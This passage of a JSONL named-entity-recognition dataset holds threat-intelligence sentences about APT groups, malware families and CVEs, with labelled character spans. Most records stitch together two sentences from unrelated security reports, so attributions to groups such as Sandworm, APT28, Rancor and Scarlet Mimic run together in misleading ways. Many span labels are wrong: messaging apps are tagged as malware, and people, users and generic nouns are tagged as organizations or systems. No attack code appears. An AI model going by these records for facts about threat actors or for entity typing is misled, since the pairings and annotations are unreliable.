The backdoor can connect to any of the C&Cs from a hardcoded list \u2013 a measure to increase resilience .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 13, "end": 17, "label": "Organization"}, {"start": 82, "end": 108, "label": "Organization"}, {"start": 128, "end": 141, "label": "Organization"}, {"start": 157, "end": 165, "label": "Indicator"}]} {"text": "In 2014 , our colleagues at Crowdstrike wrote an expos\u00e9 about a long-standing Chinese APT threat group they self-named Putter Panda , which Mandiant / FireEye refers to as APT2 . The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access .", "spans": [{"start": 28, "end": 39, "label": "Organization"}, {"start": 86, "end": 102, "label": "Organization"}, {"start": 119, "end": 131, "label": "Organization"}, {"start": 140, "end": 148, "label": "Organization"}, {"start": 151, "end": 158, "label": "Organization"}, {"start": 172, "end": 176, "label": "Organization"}, {"start": 200, "end": 217, "label": "Indicator"}]} {"text": "In 2014 , our colleagues at Crowdstrike wrote an expos about a long-standing Chinese APT threat group they self-named Putter Panda , which Mandiant / FireEye refers to as APT2 . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool .", "spans": [{"start": 28, "end": 39, "label": "Organization"}, {"start": 85, "end": 101, "label": "Organization"}, {"start": 118, "end": 130, "label": "Organization"}, {"start": 139, "end": 147, "label": "Organization"}, {"start": 150, "end": 157, "label": "Organization"}, {"start": 171, "end": 175, "label": "Organization"}, {"start": 178, "end": 191, "label": "Indicator"}, {"start": 214, "end": 223, "label": "Organization"}]} {"text": "This threat group attacked defense contractors and aerospace companies . 
China Chopper contains a remote shell ( Virtual Terminal ) function that has a first suggested command of netstat an|find ESTABLISHED .", "spans": [{"start": 5, "end": 17, "label": "Organization"}, {"start": 27, "end": 46, "label": "Organization"}, {"start": 51, "end": 70, "label": "Organization"}, {"start": 73, "end": 86, "label": "Indicator"}, {"start": 113, "end": 129, "label": "System"}]} {"text": "The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe .", "spans": [{"start": 23, "end": 36, "label": "Vulnerability"}, {"start": 227, "end": 240, "label": "Indicator"}, {"start": 244, "end": 259, "label": "Indicator"}]} {"text": "Unit 42 believes this group is previously unidentified and therefore have we have dubbed it \" RANCOR \" . The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 22, "end": 27, "label": "Organization"}, {"start": 94, "end": 100, "label": "Organization"}, {"start": 109, "end": 113, "label": "Indicator"}]} {"text": "The Rancor group 's attacks use two primary malware families which we describe in depth later in this blog and are naming DDKONG and PLAINTEE . 
The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 122, "end": 128, "label": "System"}, {"start": 133, "end": 141, "label": "System"}, {"start": 148, "end": 161, "label": "Indicator"}, {"start": 223, "end": 230, "label": "Vulnerability"}, {"start": 254, "end": 261, "label": "Vulnerability"}, {"start": 266, "end": 273, "label": "System"}, {"start": 290, "end": 303, "label": "Vulnerability"}, {"start": 306, "end": 319, "label": "Vulnerability"}, {"start": 324, "end": 337, "label": "Vulnerability"}, {"start": 351, "end": 359, "label": "Organization"}]} {"text": "We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content .", "spans": [{"start": 14, "end": 25, "label": "Malware"}, {"start": 148, "end": 155, "label": "Indicator"}, {"start": 194, "end": 200, "label": "System"}, {"start": 216, "end": 229, "label": "Vulnerability"}]} {"text": "Based on this , we believe the Rancor attackers were targeting political entities . 
Let\u2019s take a closer look at ITG08\u2019s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor .", "spans": [{"start": 31, "end": 37, "label": "Organization"}, {"start": 38, "end": 47, "label": "Organization"}, {"start": 63, "end": 81, "label": "Organization"}, {"start": 112, "end": 119, "label": "Organization"}, {"start": 275, "end": 293, "label": "Indicator"}]} {"text": "Additionally , these decoy documents are hosted on legitimate websites including a government website belonging to the Cambodia Government and in at least once case , Facebook . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe .", "spans": [{"start": 21, "end": 36, "label": "Malware"}, {"start": 119, "end": 138, "label": "Organization"}, {"start": 167, "end": 175, "label": "Organization"}, {"start": 209, "end": 226, "label": "Indicator"}, {"start": 310, "end": 317, "label": "Indicator"}]} {"text": "Our Investigation into both clusters further showed that they were both involved in attacks targeting organizations in South East Asia . Based on this , we believe the Rancor attackers were targeting political entities .", "spans": [{"start": 168, "end": 174, "label": "Organization"}, {"start": 175, "end": 184, "label": "Organization"}, {"start": 200, "end": 218, "label": "Organization"}]} {"text": "We observed DDKONG in use between February 2017 and the present , while PLAINTEE is a newer addition with the earliest known sample being observed in October 2017 . 
Other groups , such as Buhtrap , Corkow and Carbanak , were already known to target and successfully steal money from financial institutions and their customers in Russia .", "spans": [{"start": 12, "end": 18, "label": "System"}, {"start": 72, "end": 80, "label": "System"}, {"start": 171, "end": 177, "label": "Organization"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 198, "end": 204, "label": "Malware"}, {"start": 209, "end": 217, "label": "Organization"}, {"start": 283, "end": 305, "label": "Organization"}, {"start": 316, "end": 325, "label": "Organization"}]} {"text": "The RANCOR campaign represents a continued trend of targeted attacks against entities within the South East Asia region . Since last week , iSIGHT Partners has worked to provide details on the power outage in Ukraine to our global customers .", "spans": [{"start": 140, "end": 155, "label": "Organization"}, {"start": 231, "end": 240, "label": "Organization"}]} {"text": "They are interested in users of remote banking systems ( RBS ) , mainly in Russia and neighboring countries . The attacks we attribute to Scarlet Mimic have primarily targeted Uyghur and Tibetan activists as well as those who are interested in their causes .", "spans": [{"start": 138, "end": 151, "label": "Organization"}, {"start": 176, "end": 182, "label": "Organization"}, {"start": 187, "end": 204, "label": "Organization"}]} {"text": "That this group is mostly targeting businesses is apparent from the processes they are looking for on a compromised system . 
The most recent Scarlet Mimic attacks we have identified were conducted in 2015 and suggest the group has a significant interest in both Muslim activists and those interested in critiques of the Russian government and Russian President Vladimir Putin .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 36, "end": 46, "label": "Organization"}, {"start": 262, "end": 278, "label": "Organization"}, {"start": 320, "end": 338, "label": "Organization"}]} {"text": "While both RTM and Buhtrap are looking for a quite similar process list , the infection vectors are quite different . Based on analysis of the data and malware samples we have collected , Unit 42 believes the attacks described herein are the work of a group or set of cooperating groups who have a single mission , collecting information on minority groups who reside in and around northwestern China .", "spans": [{"start": 11, "end": 14, "label": "System"}, {"start": 19, "end": 26, "label": "System"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 280, "end": 286, "label": "Organization"}, {"start": 341, "end": 356, "label": "Organization"}]} {"text": "This group has used a large array of infection vectors , mostly revolving around drive-by downloads and spam . 
In the past , Scarlet Mimic has primarily targeted individuals who belong to these minority groups as well as their supporters , but we've recently found evidence to indicate the group also targets individuals working inside government anti-terrorist organizations .", "spans": [{"start": 5, "end": 10, "label": "Organization"}, {"start": 125, "end": 138, "label": "Organization"}, {"start": 194, "end": 209, "label": "Organization"}, {"start": 227, "end": 237, "label": "Organization"}, {"start": 347, "end": 375, "label": "Organization"}]} {"text": "They are both targeting businesses using accounting software , are fingerprinting systems of interest similarly , are looking for smart card readers , and finally , they deploy an array of malicious tools to spy on their victims . Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries .", "spans": [{"start": 24, "end": 34, "label": "Organization"}, {"start": 356, "end": 376, "label": "Organization"}]} {"text": "In particular , we will focus on the samples SHA-1 AA0FA4584768CE9E16D67D8C529233E99FF1BBF0 and 48BC113EC8BA20B8B80CD5D4DA92051A19D1032B . CapabilitiesFormBook is a data stealer , but not a full-fledged banker .", "spans": [{"start": 139, "end": 159, "label": "Organization"}, {"start": 203, "end": 209, "label": "Organization"}]} {"text": "Despite its known weaknesses , the RC4 algorithm is regularly used by malware authors . 
While discussions of threats in this region often focus on \" North America \" generally or just the United States , nearly 100 campaigns during this period were either specifically targeted at Canadian organizations or were customized for Canadian audiences .", "spans": [{"start": 35, "end": 38, "label": "System"}, {"start": 335, "end": 344, "label": "Organization"}]} {"text": "Based on the use of the relatively unique PLAINTEE malware , the malware 's use of the same file paths on in each cluster , and the similar targeting , we have grouped these attacks together under the RANCOR campaign moniker . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": [{"start": 42, "end": 58, "label": "System"}, {"start": 234, "end": 240, "label": "System"}, {"start": 255, "end": 275, "label": "Organization"}, {"start": 317, "end": 350, "label": "Indicator"}, {"start": 370, "end": 383, "label": "Vulnerability"}]} {"text": "Bdo is the Russian translation for RBS ( Remote Banking System ) so it is clear that RBS is a target for this malware . In this latest incident , the group registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day .", "spans": [{"start": 266, "end": 272, "label": "System"}, {"start": 283, "end": 303, "label": "Organization"}]} {"text": "Other groups , such as Buhtrap , Corkow and Carbanak , were already known to target and successfully steal money from financial institutions and their customers in Russia . 
The first time this happened was at the beginning of the month , when Proofpoint researchers blew the lid off a cyber-espionage campaign named Operation Transparent Tribe , which targeted the Indian embassies in Saudi Arabia and Kazakhstan .", "spans": [{"start": 6, "end": 12, "label": "Organization"}, {"start": 23, "end": 30, "label": "Organization"}, {"start": 33, "end": 39, "label": "Organization"}, {"start": 44, "end": 52, "label": "Organization"}, {"start": 118, "end": 140, "label": "Organization"}, {"start": 151, "end": 160, "label": "Organization"}, {"start": 243, "end": 253, "label": "Organization"}, {"start": 372, "end": 381, "label": "Organization"}]} {"text": "Our research on the RTM malware shows that the Russian banking system is still a target of choice for criminals . Back in February 2016 , Indian army officials issued a warning against the usage of three apps , WeChat , SmeshApp , and Line , fearing that these apps collected too much information if installed on smartphones used by Indian army personnel .", "spans": [{"start": 20, "end": 31, "label": "System"}, {"start": 102, "end": 111, "label": "Organization"}, {"start": 145, "end": 159, "label": "Organization"}, {"start": 211, "end": 217, "label": "Malware"}, {"start": 220, "end": 228, "label": "Malware"}, {"start": 235, "end": 239, "label": "Malware"}, {"start": 340, "end": 354, "label": "Organization"}]} {"text": "Since last week , iSIGHT Partners has worked to provide details on the power outage in Ukraine to our global customers . 
According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability .", "spans": [{"start": 18, "end": 33, "label": "Organization"}, {"start": 109, "end": 118, "label": "Organization"}, {"start": 138, "end": 151, "label": "Organization"}, {"start": 184, "end": 202, "label": "Organization"}, {"start": 222, "end": 228, "label": "System"}, {"start": 274, "end": 286, "label": "System"}, {"start": 287, "end": 300, "label": "Vulnerability"}]} {"text": "Shortly after releasing information on their espionage operations , our friends at TrendMicro found evidence that the operators were not only conducting classic strategic espionage but targeting SCADA systems as well . In addition to these , the Animal Farm attackers used at least one unknown , mysterious malware during an operation targeting computer users in Burkina Faso .", "spans": [{"start": 83, "end": 93, "label": "Organization"}, {"start": 118, "end": 127, "label": "Organization"}, {"start": 171, "end": 180, "label": "Organization"}, {"start": 354, "end": 359, "label": "Organization"}]} {"text": "iSiGHT has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 . 
PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 19, "end": 32, "label": "Organization"}, {"start": 154, "end": 170, "label": "Vulnerability"}, {"start": 173, "end": 186, "label": "Vulnerability"}, {"start": 189, "end": 197, "label": "Organization"}, {"start": 271, "end": 291, "label": "Organization"}, {"start": 332, "end": 340, "label": "Vulnerability"}]} {"text": "Sandworm Team went to ground shortly after being exposed in October of 2014 , and malware with Dune references ( the genesis for the ' Sandworm ' moniker ) which we had previously used to track them disappeared entirely . The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 135, "end": 143, "label": "Organization"}, {"start": 305, "end": 325, "label": "Organization"}, {"start": 366, "end": 374, "label": "Vulnerability"}]} {"text": "However , the unique malware variant , BlackEnergy 3 , reemerged in Ukraine early in 2015 , where we had first found Sandworm Team . 
Researching this attack and the malware used therein led Microsoft to discover other instances of PLATINUM attacking users in India around August 2015 .", "spans": [{"start": 39, "end": 52, "label": "Malware"}, {"start": 117, "end": 130, "label": "Organization"}, {"start": 190, "end": 199, "label": "Organization"}, {"start": 231, "end": 239, "label": "Organization"}, {"start": 250, "end": 255, "label": "Organization"}]} {"text": "iSiGHT Partners has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 . The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives .", "spans": [{"start": 0, "end": 15, "label": "Organization"}, {"start": 28, "end": 41, "label": "Organization"}, {"start": 163, "end": 179, "label": "Vulnerability"}, {"start": 182, "end": 195, "label": "Vulnerability"}, {"start": 202, "end": 216, "label": "Organization"}, {"start": 386, "end": 396, "label": "Organization"}]} {"text": "SIGHT Partners is still collecting information on the mechanics of the power outage and what role the KillDisk malware played in the greater event . 
The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions \u2014 often including military installations , intelligence agencies , and other government bodies .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 102, "end": 118, "label": "System"}, {"start": 181, "end": 190, "label": "Organization"}, {"start": 256, "end": 262, "label": "Organization"}, {"start": 276, "end": 285, "label": "Organization"}, {"start": 290, "end": 298, "label": "Organization"}, {"start": 396, "end": 416, "label": "Organization"}, {"start": 421, "end": 433, "label": "Organization"}, {"start": 452, "end": 460, "label": "Organization"}, {"start": 477, "end": 498, "label": "Organization"}, {"start": 511, "end": 521, "label": "Organization"}]} {"text": "Last week iSIGHT 's sources provided us with the same KillDisk malware published by Rob Lee of SANS and Dragos Security . 
Mark Zuckerberg , Jack Dorsey , Sundar Pichai , and Daniel Ek \u2014 the CEOs of Facebook , Twitter , Google and Spotify , respectively \u2014 have also fallen victim to the hackers , dispelling the notion that a career in software and technology exempts one from being compromised .", "spans": [{"start": 10, "end": 16, "label": "Organization"}, {"start": 54, "end": 70, "label": "System"}, {"start": 95, "end": 99, "label": "Organization"}, {"start": 104, "end": 119, "label": "Organization"}, {"start": 122, "end": 137, "label": "Organization"}, {"start": 140, "end": 151, "label": "Organization"}, {"start": 154, "end": 167, "label": "Organization"}, {"start": 174, "end": 183, "label": "Organization"}, {"start": 190, "end": 194, "label": "Organization"}, {"start": 198, "end": 206, "label": "Organization"}, {"start": 209, "end": 216, "label": "Organization"}, {"start": 219, "end": 225, "label": "Organization"}, {"start": 348, "end": 358, "label": "Organization"}]} {"text": "The aggressive nature of Sandworm Team 's previous activity in Europe and the United States exposed their interest in targeting critical systems and indicated preparation for cyber attack . 
The group is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": [{"start": 25, "end": 38, "label": "Organization"}, {"start": 230, "end": 240, "label": "Organization"}, {"start": 241, "end": 244, "label": "Indicator"}, {"start": 292, "end": 299, "label": "Organization"}, {"start": 337, "end": 352, "label": "Organization"}, {"start": 356, "end": 363, "label": "Organization"}, {"start": 368, "end": 377, "label": "Organization"}, {"start": 407, "end": 415, "label": "Organization"}, {"start": 420, "end": 430, "label": "Organization"}]} {"text": "This year we are going to be releasing a monthly blog post introducing the \" Threat Actor of the Month \" , complete with detailed background information on that actor . OurMine is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": [{"start": 77, "end": 89, "label": "Organization"}, {"start": 161, "end": 166, "label": "Organization"}, {"start": 169, "end": 176, "label": "Organization"}, {"start": 207, "end": 217, "label": "Organization"}, {"start": 218, "end": 221, "label": "Indicator"}, {"start": 269, "end": 276, "label": "Organization"}, {"start": 314, "end": 329, "label": "Organization"}, {"start": 333, "end": 340, "label": "Organization"}, {"start": 345, "end": 354, "label": "Organization"}, {"start": 384, "end": 392, "label": "Organization"}, {"start": 397, "end": 407, "label": "Organization"}]} {"text": "VOODOO BEAR is a highly advanced adversary with a suspected nexus to the Russian Federation . 
Probably the most high-profile attack that GandCrab was behind is a series of infections at customers of remote IT support firms in the month of February .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 137, "end": 145, "label": "Malware"}, {"start": 186, "end": 195, "label": "Organization"}, {"start": 206, "end": 222, "label": "Organization"}]} {"text": "Destructive malware used by VOODOO BEAR includes a wiper called PassKillDisk . Further tracking of the Lazarus\u2019s activities has enabled Kaspersky researchers to discover a new operation , active since at least November 2018 , which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers .", "spans": [{"start": 28, "end": 39, "label": "Organization"}, {"start": 64, "end": 76, "label": "System"}, {"start": 103, "end": 112, "label": "Organization"}, {"start": 136, "end": 145, "label": "Organization"}, {"start": 241, "end": 251, "label": "Malware"}, {"start": 263, "end": 270, "label": "System"}, {"start": 308, "end": 323, "label": "Organization"}]} {"text": "Some tools used by this actor \u2014 specifically BlackEnergy and GCat \u2014 have been adapted from commodity malware . Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors .", "spans": [{"start": 24, "end": 29, "label": "Organization"}, {"start": 45, "end": 56, "label": "Organization"}, {"start": 61, "end": 65, "label": "Organization"}, {"start": 111, "end": 116, "label": "Organization"}, {"start": 204, "end": 210, "label": "Organization"}]} {"text": "This adversary has been identified leveraging custom-developed plugins for versions 2 and 3 of the commodity malware Black Energy to target entities associated with energy , industrial control systems and SCADA , government , and media for espionage and destructive purposes , since at least 2011 . 
Keeping in mind the sensitivity of passwords , GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task .", "spans": [{"start": 117, "end": 129, "label": "System"}, {"start": 165, "end": 171, "label": "Organization"}, {"start": 213, "end": 223, "label": "Organization"}, {"start": 230, "end": 235, "label": "Organization"}, {"start": 240, "end": 249, "label": "Organization"}, {"start": 346, "end": 353, "label": "Organization"}, {"start": 487, "end": 503, "label": "Organization"}]} {"text": "A commonly observed element of implants from VOODOO BEAR \u2014 at least until this information was made public in late 2014 \u2014 were references in the malware to the 1965 science fiction novel Dune , by Frank Herbert . The threat actor\u2019s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": [{"start": 45, "end": 56, "label": "Organization"}, {"start": 224, "end": 231, "label": "Organization"}, {"start": 232, "end": 238, "label": "System"}, {"start": 285, "end": 302, "label": "Indicator"}, {"start": 367, "end": 372, "label": "Organization"}]} {"text": "This adversary has been identified leveraging custom-developed plugins for versions 2 and 3 of the commodity malware Black Energy to target entities associated with energy , government , and media for espionage and destructive purposes , since at least 2011 . 
The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": [{"start": 117, "end": 129, "label": "System"}, {"start": 165, "end": 171, "label": "Organization"}, {"start": 174, "end": 184, "label": "Organization"}, {"start": 191, "end": 196, "label": "Organization"}, {"start": 201, "end": 210, "label": "Organization"}, {"start": 264, "end": 273, "label": "Organization"}, {"start": 302, "end": 311, "label": "Organization"}, {"start": 316, "end": 336, "label": "Organization"}, {"start": 376, "end": 382, "label": "System"}, {"start": 425, "end": 434, "label": "Organization"}]} {"text": "these characteristics all highlight the likelihood that VOODOO BEAR operates in alignment with Russian state interests . This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose .", "spans": [{"start": 56, "end": 67, "label": "Organization"}, {"start": 146, "end": 153, "label": "Organization"}, {"start": 210, "end": 219, "label": "Organization"}, {"start": 266, "end": 272, "label": "System"}, {"start": 279, "end": 288, "label": "Organization"}, {"start": 298, "end": 318, "label": "Organization"}, {"start": 354, "end": 369, "label": "Organization"}]} {"text": "This adversary displays a particular focus on targeting entities in the Ukraine and is believed to be behind the Ukrainian energy sector attacks that caused widespread power outages in late 2015 . 
The attackers used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": [{"start": 201, "end": 210, "label": "Organization"}, {"start": 228, "end": 242, "label": "Malware"}, {"start": 247, "end": 260, "label": "Malware"}, {"start": 261, "end": 268, "label": "Malware"}, {"start": 300, "end": 320, "label": "Organization"}]} {"text": "VOODOO BEAR appears to be integrated into an organization that also operates or tasks multiple pro-Russian hacktivist entities . The admin@338 used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 133, "end": 142, "label": "Organization"}, {"start": 160, "end": 174, "label": "Malware"}, {"start": 179, "end": 192, "label": "Malware"}, {"start": 193, "end": 200, "label": "Malware"}, {"start": 232, "end": 252, "label": "Organization"}]} {"text": "In the summer of 2014 , BlackEnergy caught our attention when we noticed that samples of it were now tailored to target Ukrainian government institutions . The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": [{"start": 24, "end": 35, "label": "Organization"}, {"start": 130, "end": 153, "label": "Organization"}, {"start": 194, "end": 203, "label": "Organization"}, {"start": 208, "end": 228, "label": "Organization"}, {"start": 268, "end": 274, "label": "System"}, {"start": 317, "end": 326, "label": "Organization"}]} {"text": "Related or not , one thing is certain : the actor ( s ) using these customized BlackEnergy malware are intent on stealing information from the targets . The targets were similar to a 2015 TG-4127 campaign \u2014 individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. 
and Europe , individuals working in the defense and government supply chain , and authors and journalists \u2014 but also included email accounts linked to the November 2016 United States presidential election .", "spans": [{"start": 44, "end": 49, "label": "Organization"}, {"start": 79, "end": 98, "label": "System"}, {"start": 279, "end": 287, "label": "Organization"}, {"start": 292, "end": 312, "label": "Organization"}, {"start": 365, "end": 372, "label": "Organization"}, {"start": 377, "end": 387, "label": "Organization"}, {"start": 407, "end": 414, "label": "Organization"}, {"start": 419, "end": 430, "label": "Organization"}]} {"text": "In this paper we focus only on BlackEnergy samples known to be used specifically by the actors we identify as Quedagh , who seem to have a particular interest in political targets . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": [{"start": 31, "end": 50, "label": "System"}, {"start": 88, "end": 94, "label": "Organization"}, {"start": 110, "end": 117, "label": "Organization"}, {"start": 162, "end": 179, "label": "Organization"}, {"start": 319, "end": 330, "label": "Organization"}, {"start": 333, "end": 343, "label": "Organization"}, {"start": 346, "end": 362, "label": "Organization"}, {"start": 365, "end": 379, "label": "Organization"}, {"start": 386, "end": 396, "label": "Organization"}, {"start": 401, "end": 408, "label": "Organization"}, {"start": 432, "end": 450, "label": "Organization"}]} {"text": "Special focus will be on the samples that were used in targeted attacks against Ukrainian government organizations earlier this year . APT28 espionage activity has primarily targeted entities in the U.S. 
, Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": [{"start": 90, "end": 114, "label": "Organization"}, {"start": 272, "end": 283, "label": "Organization"}, {"start": 288, "end": 298, "label": "Organization"}, {"start": 301, "end": 317, "label": "Organization"}, {"start": 320, "end": 334, "label": "Organization"}, {"start": 341, "end": 351, "label": "Organization"}, {"start": 356, "end": 363, "label": "Organization"}, {"start": 387, "end": 405, "label": "Organization"}]} {"text": "Although they may have started much earlier , the earliest BlackEnergy sample we could attribute to the Quedagh gang is from December 14 , 2010 . APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": [{"start": 59, "end": 77, "label": "System"}, {"start": 104, "end": 116, "label": "Organization"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 168, "end": 175, "label": "Organization"}, {"start": 180, "end": 201, "label": "Organization"}, {"start": 221, "end": 227, "label": "System"}]} {"text": "We warned our clients of new features suggesting an increased focus on European targets - though verification of targets was not possible at the time . We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian .", "spans": [{"start": 188, "end": 197, "label": "Organization"}, {"start": 205, "end": 210, "label": "Organization"}, {"start": 238, "end": 246, "label": "Organization"}, {"start": 250, "end": 258, "label": "Organization"}]} {"text": "Sandworm Team may have opted for a ' hide in plain sight ' approach to evade detections from rootkit scanners , such as GMER and RootkitRevealer , that checks for system anomalies . 
Russian citizens\u2014journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 190, "end": 210, "label": "Organization"}, {"start": 213, "end": 232, "label": "Organization"}, {"start": 235, "end": 246, "label": "Organization"}, {"start": 249, "end": 276, "label": "Organization"}, {"start": 283, "end": 290, "label": "Organization"}, {"start": 312, "end": 322, "label": "Organization"}]} {"text": "Table 3 ( above ) summarizes the commands supported by the variants used in the attack against Ukrainian government organizations . In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 .", "spans": [{"start": 105, "end": 129, "label": "Organization"}, {"start": 210, "end": 215, "label": "Organization"}, {"start": 242, "end": 253, "label": "Organization"}, {"start": 278, "end": 288, "label": "Organization"}, {"start": 293, "end": 304, "label": "Organization"}]} {"text": "In the summer of 2014 , we noted that certain samples of BlackEnergy malware began targeting Ukrainian government organizations for information harvesting . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": [{"start": 57, "end": 76, "label": "System"}, {"start": 103, "end": 127, "label": "Organization"}, {"start": 167, "end": 172, "label": "Organization"}, {"start": 271, "end": 282, "label": "Indicator"}, {"start": 342, "end": 351, "label": "Organization"}]} {"text": "These samples were identified as being the work of one group , referred to in this document as \" Quedagh \" , which has a history of targeting political organizations . 
In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines .", "spans": [{"start": 55, "end": 60, "label": "Organization"}, {"start": 97, "end": 104, "label": "Organization"}, {"start": 142, "end": 165, "label": "Organization"}, {"start": 178, "end": 196, "label": "Organization"}, {"start": 226, "end": 231, "label": "Organization"}, {"start": 310, "end": 318, "label": "Organization"}, {"start": 343, "end": 363, "label": "Organization"}]} {"text": "The attacks we attribute to Scarlet Mimic have primarily targeted Uyghur and Tibetan activists as well as those who are interested in their causes . APT33 sent spear phishing emails to employees whose jobs related to the aviation industry .", "spans": [{"start": 28, "end": 41, "label": "Organization"}, {"start": 66, "end": 72, "label": "Organization"}, {"start": 77, "end": 94, "label": "Organization"}, {"start": 149, "end": 154, "label": "Organization"}, {"start": 175, "end": 181, "label": "System"}, {"start": 185, "end": 194, "label": "Organization"}, {"start": 221, "end": 238, "label": "Organization"}]} {"text": "To infect individuals with access to the data the actors desire , Scarlet Mimic deploys both spear-phishing and watering hole ( strategic web compromise ) attacks . 
APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations .", "spans": [{"start": 50, "end": 56, "label": "Organization"}, {"start": 66, "end": 79, "label": "Organization"}, {"start": 165, "end": 170, "label": "Organization"}, {"start": 182, "end": 197, "label": "Organization"}, {"start": 200, "end": 215, "label": "Organization"}, {"start": 222, "end": 232, "label": "Organization"}, {"start": 296, "end": 319, "label": "Organization"}]} {"text": "As with many other attackers who use spear-phishing to infect victims , Scarlet Mimic makes heavy use of \" decoy \" files . The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts .", "spans": [{"start": 19, "end": 28, "label": "Organization"}, {"start": 72, "end": 85, "label": "Organization"}, {"start": 201, "end": 210, "label": "Organization"}]} {"text": "The most recent Scarlet Mimic attacks we have identified were conducted in 2015 and suggest the group has a significant interest in both Muslim activists and those interested in critiques of the Russian government and Russian President Vladimir Putin . In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company .", "spans": [{"start": 96, "end": 101, "label": "Organization"}, {"start": 137, "end": 153, "label": "Organization"}, {"start": 267, "end": 272, "label": "Organization"}, {"start": 339, "end": 351, "label": "Organization"}, {"start": 372, "end": 389, "label": "Organization"}]} {"text": "Using these tactics Scarlet Mimic can directly target previously identified individuals ( spear phishing ) as well as unidentified individuals who are interested in a specific subject ( watering hole ) . 
